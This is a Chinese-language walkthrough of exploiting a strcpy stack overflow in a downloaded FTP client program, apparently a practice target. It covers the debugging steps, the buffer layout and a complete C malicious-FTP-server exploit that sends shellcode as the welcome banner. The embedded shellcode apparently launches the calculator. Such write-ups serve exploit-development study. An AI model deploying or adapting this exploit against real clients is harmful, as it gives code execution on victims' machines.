国际惯例,下载程序后先拖入IDA分析,看了半天也没看出个所以然。
于是直接发送超长数据,看程序会不会崩。
FTP服务器在接收完USER和PASS之后,会发送Welcome信息。直觉告诉我,这儿应该会崩,于是写个socket程序,发送长字符串,程序果然崩了。
然后用windbg载入,用kn命令看一下调用堆栈。尝试了几次后,找到了关键函数sub_4013D0。
这个函数先是创建socket,然后连接远程FTP服务器,之后会调用recv()函数。而且在每次调用recv()之后,都会将接收数据的buf作为参数,调用sub_401032。这个函数就是被覆盖返回地址的函数了。
进入sub_401032后,程序申请了一个0x12C字节的空间
Dest = byte ptr -12Ch
然后将其作为Dest,将前面传入的buf作为Source,调用strcpy()函数。
.text:0040126E mov eax, [ebp+Source]
.text:00401271 push eax ; Source
.text:00401272 lea ecx, [ebp+Dest]
.text:00401278 push ecx ; Dest
.text:00401279 call _strcpy
由于strcpy()不检查缓冲区边界,造成溢出。
找到溢出点之后,接下来就要构造缓冲区,进行利用了。
strcpy函数返回后,eax作为返回值存放的是Dest的地址,因此可以用它还做跳板。
---------------------
shellcode 共计0x12C字节
junk
---------------------
ebp
RetAddr <-- 填充为7c8f6571,即jmp eax
由于每次调用recv()接收数据之后,都会调用sub_401032,因此可以在接受连接发送banner的时候,直接发送shellcode过去。
#include <stdio.h>
#include <stdlib.h>
#include <WinSock.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")
#define PORT 21
#define BACKLOG 10
#define LEN 308
char buf[] =
"\xFC\x68\xC9\xBC\xA6\x6B\x68\x63\x89\xD1\x4F\x8B"
"\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x33\xD2"
"\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09"
"\x8B\x51\x18\x8B\x52\x34\x80\xFA\x33\x74\x02\x8B"
"\x09\x8B\x69\x08\xAD\x60\x8B\x45\x3C\x8B\x4C\x05"
"\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B"
"\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08"
"\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C"
"\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B"
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61"
"\x3D\xC9\xBC\xA6\x6B\x75\xB5\x33\xDB\x33\xC0\x53"
"\x40\x3C\x20\x75\xFA\x33\xDB\x53\xBB\x63\x61\x6C"
"\x63\x53\x8B\xCC\x33\xC0\x54\x54\x50\x50\x50\x54"
"\x50\x50\x51\x50\xFF\x57\xFC\x33\xDB\x53\xFF\x57"
"\xF8";
int InitSocket()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(2, 2);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
{
printf("WSAStartup failed with error: %d\n", err);
return 1;
}
if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
{
printf("Could not find a usable version of Winsock.dll\n");
WSACleanup();
return 1;
}
return 0;
}
int main()
{
SOCKET sockServer;
SOCKET sockClient;
SOCKADDR_IN ServerAddr;
SOCKADDR_IN ClientAddr;
int sin_size;
char shellcode[LEN];
memset(shellcode, 0x90, LEN);
strcpy(shellcode, buf);
shellcode[strlen(buf)] = '\x90';
*((int *)(shellcode+LEN-4)) = 0x7c8f6571; // jmp eax
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(PORT);
ServerAddr.sin_addr.S_un.S_addr = INADDR_ANY;
memset(&(ServerAddr.sin_zero), 0, sizeof(ServerAddr.sin_zero));
InitSocket();
if ((sockServer = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("[-] Create socket failed.\n");
exit(1);
}
printf("[+] Create socket succeed.\n");
if (bind(sockServer, (sockaddr *)&ServerAddr, sizeof(ServerAddr)) == -1)
{
printf("[-] Bind port failed.\n");
exit(1);
}
if (listen(sockServer, BACKLOG) == -1)
{
printf("[-] listen failed.\n");
exit(1);
}
printf("[+] Listening port %d...\n", PORT);
sin_size = sizeof(SOCKADDR_IN);
sockClient = accept(sockServer, (sockaddr *)&ClientAddr, &sin_size);
if (sockClient == INVALID_SOCKET)
{
printf("[-] accept failed.\n");
exit(1);
}
printf("[+] Receive connect from %s.\n", inet_ntoa(ClientAddr.sin_addr));
printf("[+] Sending shellcode...\n");
if (send(sockClient, shellcode, LEN, 0) == -1)
{
printf("[-] Send shellcode failed.\n");
exit(0);
}
printf("[+] Done.\n");
closesocket(sockClient);
closesocket(sockServer);
WSACleanup();
return 0;
}
利用程序很简单,监听21端口,收到连接就发送shellcode过去。